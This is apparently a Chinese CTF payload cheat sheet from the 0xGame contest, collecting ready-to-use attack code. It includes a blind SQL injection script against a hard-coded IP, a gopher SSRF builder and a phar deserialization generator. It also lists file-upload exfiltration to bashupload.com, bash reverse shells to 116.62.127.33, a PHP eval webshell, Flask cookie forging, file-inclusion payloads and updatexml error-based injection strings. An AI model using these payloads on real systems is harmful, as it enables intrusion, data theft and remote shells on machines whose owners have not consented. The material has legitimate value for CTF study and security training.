常用payload总结(更新中):
bool盲注,post类型
"""你爱过一个女孩吗?你体验过那种感觉吗?"""import requestsurl="http://159.75.116.195:8086/login.php"flag=''for i in range(1,500):min = 32max = 127while min<max:mid=(min+max)//2# payload=f"or(ascii(substr(version(),{i},1))>{mid})#"#payload=f'or(ascii(substr(secret,{i},1))>{mid})#'#payload=f'or(if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0))#'# payload=f"or((if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(!(table_schema<>'test'))),{i},1))>{mid},1,0)))#"# payload=f"or((if(ascii(mid((SELECT(group_concat(column_name))from(information_schema.columns)where(!(table_name<>'0xgame_secret'))),{i},1))>{mid},1,0)))#"payload=f"or((if(ascii(mid((select(group_concat(secret))from(test.0xgame_secret)),{i},1))>{mid},1,0)))#"#payload=f"or(ascii(substr(version(),{i},1))>{mid})#"headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','Content-Type':'application/x-www-form-urlencoded'}data={'username':'\\','password':payload}response=requests.post(url=url,data=data)if 'l0v3' in response.text:min =mid+1else:max=midif min !=32 :flag+=chr(min)else:breakprint(flag)
SSRF gopher协议
转化脚本
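"""Wrap an HTTP POST request in a gopher:// URL for SSRF.

gopher:// lets a server-side fetcher open a TCP connection and send arbitrary bytes,
so an SSRF sink can be turned into an internal POST. The result is URL-encoded twice:
once so the raw request survives as the gopher selector (after the leading `_`), and
once more because the final URL is itself passed through a URL parameter that the
target decodes before fetching.
"""
import urllib.parse


def build_gopher_post(host, port, path, body, content_type="application/x-www-form-urlencoded"):
    """Return a double-URL-encoded gopher URL that POSTs `body` to http://host:port/path.

    `body` is sent byte-for-byte (any %XX escapes it contains are NOT decoded here).
    Content-Length is computed from the body: the original hard-coded 50 for a
    29-byte body, and a Content-Length larger than the body makes the receiving
    server wait for bytes that never arrive.
    """
    body_len = len(body.encode("utf-8"))
    request_lines = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}:{port}",
        f"Content-Length: {body_len}",
        f"Content-Type: {content_type}",
        "",  # blank line terminates the headers
        body,
    ]
    # HTTP wants CRLF line endings; quote() turns "\r\n" into %0D%0A, which is what
    # the original achieved by replacing %0A with %0D%0A after encoding.
    raw_request = "\r\n".join(request_lines)
    selector = urllib.parse.quote(raw_request)
    gopher_url = f"gopher://{host}:{port}/_{selector}"
    return urllib.parse.quote(gopher_url)


def main():
    # Body from the original: "name=" + double-URL-encoded "/flag" (%25%32%66... -> %2f%66%6c%61%67 -> /flag),
    # i.e. the target is expected to decode the value once more before using it.
    body = "name=%25%32%66%25%36%36%25%36%63%25%36%31%25%36%37"
    print(build_gopher_post("127.1", 80, "/read.php", body))


if __name__ == "__main__":
    main()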
GraphQL
https://book.hacktricks.xyz/pentesting/pentesting-web/graphql
https://threst.github.io/2018/05/22/你肯定不知道的GraphQL安全概述和测试技巧/
{"query":"{__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}"}
内省查询(introspection):列出 schema 中的所有类型、字段和参数(GraphQL 没有"表/列"的概念,对应的是 type/field;生产环境常会关闭内省)
{"query":"{user(id: 1){username,privateEmail}}"}
查数据
phar反序列化
@unlink('yuan.phar');
// Build a phar whose manifest metadata carries a serialized object: when the
// archive is later opened through the phar:// wrapper, that metadata is
// unserialized, which is the deserialization sink this technique relies on.
// NOTE: writing a .phar requires phar.readonly=Off (e.g. php -d phar.readonly=0 gen.php).
$phar = new Phar("yuan.phar"); // file name; the extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // stub; __HALT_COMPILER() is mandatory
$phar->setMetadata($s); // $s: the gadget object to smuggle (defined by the caller) — stored in the manifest as its serialized form
$phar->addFromString("test.txt", "test"); // some file must be added; its content does not matter here
$phar->stopBuffering(); // the signature is computed automatically on write
字典密码生成
生成如000-999的序列
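"""Generate a zero-padded numeric wordlist (e.g. 000-999) for dictionary attacks."""


def write_number_wordlist(start, end, width, path):
    """Append every integer in [start, end] to `path`, one per line, zero-padded to `width`.

    Args:
        start, end: inclusive integer range (an empty range writes nothing).
        width: minimum number of digits; longer numbers are written as-is
               (str.zfill never truncates).
        path: output file. It is opened once in append mode, as the original did,
              so running twice appends a second copy of the list.
    """
    with open(path, "a") as out:
        # One open() for the whole range instead of one per number.
        out.writelines(str(n).zfill(width) + "\n" for n in range(start, end + 1))


def main():
    start = int(input("请输入开始的数值:"))
    end = int(input("请输入结束的数值:"))
    num = int(input("请输入生成的位数:"))
    path = str(start) + "到" + str(end) + "的" + str(num) + "位数字典.txt"  # output file name
    write_number_wordlist(start, end, num, path)


if __name__ == "__main__":
    main()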
linux查找文件字符串
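# Recursively search /tmp for the flag prefix. -n prints the line number, -I skips
# binary files, and stderr is silenced so unreadable directories don't bury the hits.
grep -rIn 0xGame /tmp 2>/dev/null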
MariaDB/Mysql
无information_schema注入
-- Enumerate the tables of the current database without touching information_schema
-- (useful when that schema name is blacklisted by a filter/WAF).
-- NOTE(review): needs performance_schema enabled and readable by the current user,
-- and this summary table is believed to list only objects the server has already
-- accessed since startup — confirm on the target before relying on a "missing" table.
SELECT object_name FROM performance_schema.objects_summary_global_by_type WHERE object_schema = DATABASE();
参考文章:(国外大牛)
小权限下载目标服务器上文件
解决办法先上传后下载
# Upload-then-download: when a low-privilege shell cannot serve the file directly,
# push it to a drop host and fetch it from there.
# NOTE: bashupload.com is a public third-party service — the file leaves your
# control the moment it is uploaded. For anything sensitive, use a listener you
# own (e.g. `curl -T file http://<your-host>/`) instead.
curl bashupload.com -T your_file.txt
伪造请求头
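"""Forge request headers (User-Agent / X-Forwarded-For) and POST the two form fields.

The base64 blob at the bottom is the challenge's PHP source; decoding it shows what the
server actually compares (GET 0xGame2021 against a fixed string, and md5 of the two
POST fields against each other — so any two equal values satisfy it).
"""
import base64

URL = "http://159.75.116.195:700/?0xGame2021=welcome to the 0xGame2021"
FORM = {"X1cT34m": "1", "Pupi1": "1"}
HEADERS = {
    # http.client only encodes str header values as latin-1, so a non-Latin-1
    # User-Agent has to be handed over as UTF-8 bytes.
    "User-Agent": "N1k0la浏览器".encode("utf-8"),
    "x-forwarded-for": "127.0.0.1",
}
HINT_B64 = "JGE9JF9HRVRbJzB4R2FtZTIwMjEnXTskYj0kX1BPU1RbJ1gxY1QzNG0nXTskZD0kX1BPU1RbJ1B1cGkxJ107JGM9J3dlbGNvbWUgdG8gdGhlIDB4R2FtZTIwMjEnO2lmKG1kNSgkYik9PW1kNSgkZCkmJiRhPT09JGMpe2VjaG8gJGZsYWc7fQ=="


def decode_hint(b64):
    """Return the PHP source hidden in the base64 hint as bytes."""
    return base64.b64decode(b64)


def main():
    import requests

    response = requests.post(url=URL, headers=HEADERS, data=FORM, timeout=10)
    print(response.text)
    print(decode_hint(HINT_B64))


if __name__ == "__main__":
    main()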
人工智能识别解密
ciphey
apt直接下载
python -m ciphey -t "密文"
base破解:basecrack
python basecrack.py
反弹shell
在服务器上开启监听:nc -lvvnp 8888
# Interactive bash with stdin/stdout/stderr wired to a TCP socket back to the listener.
# Both forms do the same thing: `>&` sends stdout and stderr to the socket, then stdin
# is duplicated from an fd that already points at the socket (`<&2` from stderr,
# `0>&1` from stdout — the second is the canonical form). Needs bash (/dev/tcp is a
# bash-only pseudo path) and outbound access to port 8888; the channel is plaintext.
bash -i >& /dev/tcp/116.62.127.33/8888 <&2
bash -i >& /dev/tcp/116.62.127.33/8888 0>&1
二次反弹
连接之后发现命令无回显,可以弹到服务器上其他端口,新开终端监听,在原来终端反弹
flask session 伪造(必须拿到 SECRET_KEY:cookie 只是签名不加密,没有密钥也能解码看内容,但无法重新签名)
# Re-sign a Flask session cookie with the recovered SECRET_KEY (-s) and the chosen
# payload (-t). Only the signature needs the key; the payload itself is just
# base64(+zlib) and can be read without it (the tool's decode mode, presumably).
python3 flask_session_cookie_manager3.py encode -s 'x1ct34myydsytstflglgjhdfhsh' -t '{"name":"admin","uid":"1"}'
php短标签(需要 php.ini 中 short_open_tag=On,否则 `<?` 不会被当作 PHP 代码)
<?
/* Short-tag one-line webshell: requires short_open_tag=On, otherwise the file is
   served verbatim. It executes whatever is POSTed as parameter `a`; plant it only
   on a target you are authorised to test and remove it afterwards. */
@eval($_POST['a']);
?>
md5爆破脚本
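"""Brute-force strings whose double MD5 is a PHP "magic hash": `0e` followed only by digits.

PHP's loose comparison (==) parses such hex strings as the float 0e... == 0, so any
two magic hashes compare equal. Note the search space: the chance per candidate is
roughly 1/256 for the `0e` prefix times (10/16)^30 for the remaining digits, i.e. a
few in 1e9, so expect to reach length 5 (~9e8 candidates) before a hit.
"""
import hashlib
import itertools
import re
import string

payload = string.ascii_letters + string.digits
_MAGIC = re.compile(r"0e[0-9]+")


def double_md5(s: str) -> str:
    """Return md5(md5(s)) as lowercase hex, hashing the hex digest of the first round."""
    first = hashlib.md5(s.encode("utf-8")).hexdigest()
    return hashlib.md5(first.encode("utf-8")).hexdigest()


def is_magic_hash(digest: str) -> bool:
    """True when `digest` is `0e` followed by one or more ASCII digits only."""
    return _MAGIC.fullmatch(digest) is not None


def iter_magic_strings(alphabet, min_len, max_len):
    """Yield every string over `alphabet` with length in [min_len, max_len] whose double MD5 is magic.

    Candidates are produced in the same order as the original recursion: by length,
    then lexicographically in alphabet order.
    """
    for length in range(min_len, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if is_magic_hash(double_md5(candidate)):
                yield candidate


def main():
    # Lengths 3..29, as in the original range(3, 30).
    for s in iter_magic_strings(payload, 3, 29):
        print(s, flush=True)


if __name__ == "__main__":
    main()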
python 正则应用
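"""Solve a "compute the expression on the page" challenge within one session.

The expression is scraped from the first response, evaluated, and POSTed back as
`result`. The original called eval() on the scraped text — code execution driven by
whatever a remote server chooses to put in its page — so it is replaced by an
arithmetic-only evaluator.
"""
import ast
import operator
import re

URL = "https://756-9d36cee9-e231-4196-86c6-49294073e191.do-not-trust.hacking.run/"


def _pow(base, exponent):
    # Cap the exponent so a hostile page cannot make us compute 9**9**9.
    if abs(exponent) > 10_000:
        raise ValueError("exponent too large")
    return base ** exponent


_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
    ast.Pow: _pow,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def extract_expression(html):
    """Return the text preceding the first `</p>` on the first line that contains one.

    Same extraction as the original (`re.findall(r".*</p>")[0][:-4]`); raises
    ValueError instead of IndexError when the page has no `</p>`. Whether the page
    really puts the bare expression right before `</p>` is an assumption inherited
    from the original — check the raw response if evaluation fails.
    """
    matches = re.findall(r".*</p>", html)
    if not matches:
        raise ValueError("no </p> found in the response")
    return matches[0][:-4]


def safe_eval(expr):
    """Evaluate `expr` as pure arithmetic on numeric literals.

    Accepts numbers, + - * / // % ** and unary +/-. Names, calls, attribute access,
    subscripts and anything else raise ValueError, so a page that returns
    `__import__('os').system(...)` is rejected rather than executed.
    """
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as err:
        raise ValueError(f"not an expression: {expr!r}") from err

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)) and not isinstance(node.value, bool):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported syntax in expression: {ast.dump(node)}")

    return walk(tree)


def main():
    import requests

    session = requests.Session()  # keep the cookie between the GET and the POST
    first = session.get(url=URL)
    result = safe_eval(extract_expression(first.text))
    second = session.post(url=URL, data={"result": result})
    print(second.text)


if __name__ == "__main__":
    main()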
文件包含
/index2.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b    (data:// 伪协议,base64 内容为 `<?php phpinfo();?>`,需要 allow_url_include=On)
index.php?file=php://filter/convert.base64-encode/resource=index.php    (php://filter 读源码,对输出做 base64 解码即可)
php://input
报错注入
payload:
- 使用()代替空格
- 使用like代替=
- 使用right、left代替substring、mid
- updatexml 的报错信息只回显 32 个字符,所以下面用 left/right(...,30) 分段读取

```sql
1'or(1)like(2)%23
1'or(updatexml('~',concat('~',database(),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(left(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(right(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(group_concat(id,'~',username,'~',password))from(geek.H4rDsq1)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(right(group_concat(id,'~',username,'~',password),30))from(geek.H4rDsq1)),'~'),'~'))%23
```
